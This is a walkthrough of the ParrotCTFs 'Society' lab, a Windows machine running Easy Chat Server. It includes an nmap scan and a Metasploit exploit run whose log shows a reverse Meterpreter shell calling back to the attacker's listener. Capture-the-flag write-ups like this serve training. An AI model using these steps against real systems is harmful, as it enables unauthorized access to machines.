Post

ParrotCTFs Society Walkthrough

ParrotCTFs machine walkthrough

ParrotCTFs Society Walkthrough

Another Windows Machine Society from ParrotCTFs , this room is Professional Labs you can also try it if you want , Here : Machine Link , its very straight forward solution to rooting the machine . This machine is targeting the personal, starting in cybersecurity.

NameSociety
DifficultyEasy
CategoryBuffer Overflow
DescriptionWelcome society, a virtual world where the only currency is words, and the conversations never stop. Our servers are like a bustling cafe where people come to chat, share stories, and connect with others from all over the world.

So let’s start:

  • First we can connect with the vpn

Image

  • now we can start the machine ( if machine not seems to work , do reset and try again )

Image

  • check if machine is accessible or not

Image

# Enumeration


  • let’s first start with the basic nmap scan …
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
┌──(kali㉿kali)-[~/Downloads]
└─$ nmap -sC -sV -p- 10.53.0.55 --min-rate=1500 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-23 23:12 EDT
Nmap scan report for 10.53.0.55
Host is up (0.20s latency).
Not shown: 65519 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Easy Chat Server httpd 1.0
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp   open  ssl/http      Easy Chat Server httpd 1.0
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DESKTOP-UT6N7VL
| Not valid before: 2025-01-19T03:52:19
|_Not valid after:  2025-07-21T03:52:19
|_ssl-date: 2025-04-08T04:25:22+00:00; -45d22h51m05s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: DESKTOP-UT6N7VL
|   NetBIOS_Domain_Name: DESKTOP-UT6N7VL
|   NetBIOS_Computer_Name: DESKTOP-UT6N7VL
|   DNS_Domain_Name: DESKTOP-UT6N7VL
|   DNS_Computer_Name: DESKTOP-UT6N7VL
|   Product_Version: 10.0.19041
|_  System_Time: 2025-04-08T04:24:09+00:00
5040/tcp  open  unknown
7680/tcp  open  pando-pub?
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: DESKTOP-UT6N7VL, NetBIOS user: <unknown>, NetBIOS MAC: c6:dc:c8:ef:e3:7f (unknown)
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-04-08T04:24:08
|_  start_date: N/A
|_clock-skew: mean: -45d22h51m05s, deviation: 0s, median: -45d22h51m05s
  • i find out the at port 80 , Easy Chat Server httpd 1.0 service is running and other ports are open too .

Image

  • i search this service name on the google and find out that version is vulnerable and assigned a cve ( CVE-2004-2466 ) as category is already mentioned in the lab details , help more accurate search.

Image

  • then i look in to the metasploit for module to this vulnerability or CVE .
  • and i find out one.

Image

# Exploitation


  • let’s select the module and see the options for this module , which have to be set before running this .
  • we can also check before running this , that it is indeed vulnerable or not and it is bytheway

Image

  • now i had setup all the options required for this module , let’s exploit it
1
2
3
4
5
6
7
8
msf6 exploit(windows/http/efs_easychatserver_username) > exploit
[*] Started reverse TCP handler on 10.14.0.15:4444 
[*] Sending request (612 bytes) to target (Easy Chat Server 2.1 - 3.1)
[*] Sending stage (177734 bytes) to 10.53.0.55
[*] Meterpreter session 1 opened (10.14.0.15:4444 -> 10.53.0.55:61022) at 2025-05-23 23:15:10 -0400

meterpreter > getuid
Server username: DESKTOP-UT6N7VL\jacob
  • now i have shell of jacob ( you can check help menu for command in metasploit )
  • we got flag file in the Desktop folder of jocob , and this file says that this flag is for both user and root , so no need for privilege escalation .

Image


# Final Thoughts

I hope this blog continues to be helpful in your learning journey!. If you find this blog helpful, I’d love to hear your thoughts — my inbox is always open for feedback. Please excuse any typos, and feel free to point them out so I can correct them. Thanks for understanding and happy learning!. You can contact me on Linkedin and Twitter
linkdin
Twitter
Machine Platform

This post is licensed under CC BY 4.0 by the author.